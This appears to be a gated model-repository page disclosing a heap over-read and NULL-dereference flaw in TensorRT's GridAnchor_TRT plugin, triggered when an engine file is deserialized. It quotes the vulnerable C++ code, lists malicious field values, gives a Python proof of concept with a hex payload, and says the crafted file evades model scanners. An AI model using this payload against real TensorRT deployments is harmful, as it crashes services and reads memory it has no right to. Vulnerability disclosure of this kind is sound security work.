You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

TensorRT GridAnchorPlugin β€” Heap Buffer Over-Read PoC

Format: TensorRT (.engine / .trt / .mytrtfile)
Affected component: plugin/gridAnchorPlugin/gridAnchorPlugin.cpp
Plugin name: GridAnchor_TRT (registered globally by initLibNvInferPlugins())
Trigger: deserializeCudaEngine() β€” at model load time, not inference
CWE: CWE-125 (Out-of-bounds Read), CWE-476 (NULL Pointer Dereference)


Vulnerability

In GridAnchorGenerator::GridAnchorGenerator(void const* data, size_t length, ...), the numAspectRatios field is read directly from attacker-controlled serialized plugin state with no bounds checking before the final PLUGIN_VALIDATE:

// gridAnchorPlugin.cpp
mParam[id].numAspectRatios = read<int32_t>(d);          // attacker-controlled
mParam[id].aspectRatios = malloc(sizeof(float) * mParam[id].numAspectRatios);
for (int32_t i = 0; i < mParam[id].numAspectRatios; ++i)
    mParam[id].aspectRatios[i] = read<float>(d);        // ← NO BOUNDS CHECK HERE
//  ^ walks arbitrarily far past the plugin state buffer into adjacent heap

PLUGIN_VALIDATE(d == a + length);                       // ← too late, already happened

The read<T>() template (from plugin/common/plugin.h) performs a raw memcpy with zero remaining-buffer tracking:

template <typename T>
T read(const char*& buffer) {
    T val;
    std::memcpy(&val, static_cast<void const*>(buffer), sizeof(T)); // no bounds check
    buffer += sizeof(T);
    return val;
}

Exploit Modes

Mode Value Effect
OOB read numAspectRatios = 0x7FFE malloc(131,064 B) succeeds; loop reads 131 KB past state end
NULL deref numAspectRatios = -1 malloc(~16 GB) β†’ NULL; write to NULL β†’ SIGSEGV
mNumPriors OOB mNumPriors = 0x7FFFFFFF deserializeToDevice() copies 8 GB from heap to GPU

Reproduce

import pycuda.autoinit
import tensorrt as trt

logger = trt.Logger(trt.Logger.ERROR)
trt.init_libnvinfer_plugins(logger, "")
creator = trt.get_plugin_registry().get_plugin_creator("GridAnchor_TRT", "1", "")

# OOB read: numAspectRatios = 0x7FFE
payload = bytes.fromhex("01000000295c8f3d9a99193efe7f00004000000040000000cdcccc3dcdcccc3dcdcccc3dcdcccc3d08000000cdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3dcdcccc3d")
result = creator.deserialize_plugin("GridAnchor_TRT", payload)
# β†’ None (exception caught) or SIGSEGV
# β†’ CWE-125 confirmed

Or run poc_trigger.py directly:

pip install tensorrt pycuda
python3 poc_trigger.py

Files

File Description
poc_trigger.py Standalone Python PoC β€” runs on any TRT-enabled machine
malicious_oob_state.bin Raw plugin state: numAspectRatios=0x7FFE (OOB read)
malicious_null_state.bin Raw plugin state: numAspectRatios=-1 (NULL deref)

Impact

  • Any application calling deserializeCudaEngine() on an untrusted .engine file is vulnerable β€” no special configuration required
  • GridAnchor_TRT is registered automatically by initLibNvInferPlugins(), which is called by virtually every TRT-based deployment framework
  • Scanner bypass: protectai/model-scanner and similar tools do not inspect plugin state field values, so this file passes all existing scans
  • No inference required: crash occurs at load time
Downloads last month
-
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support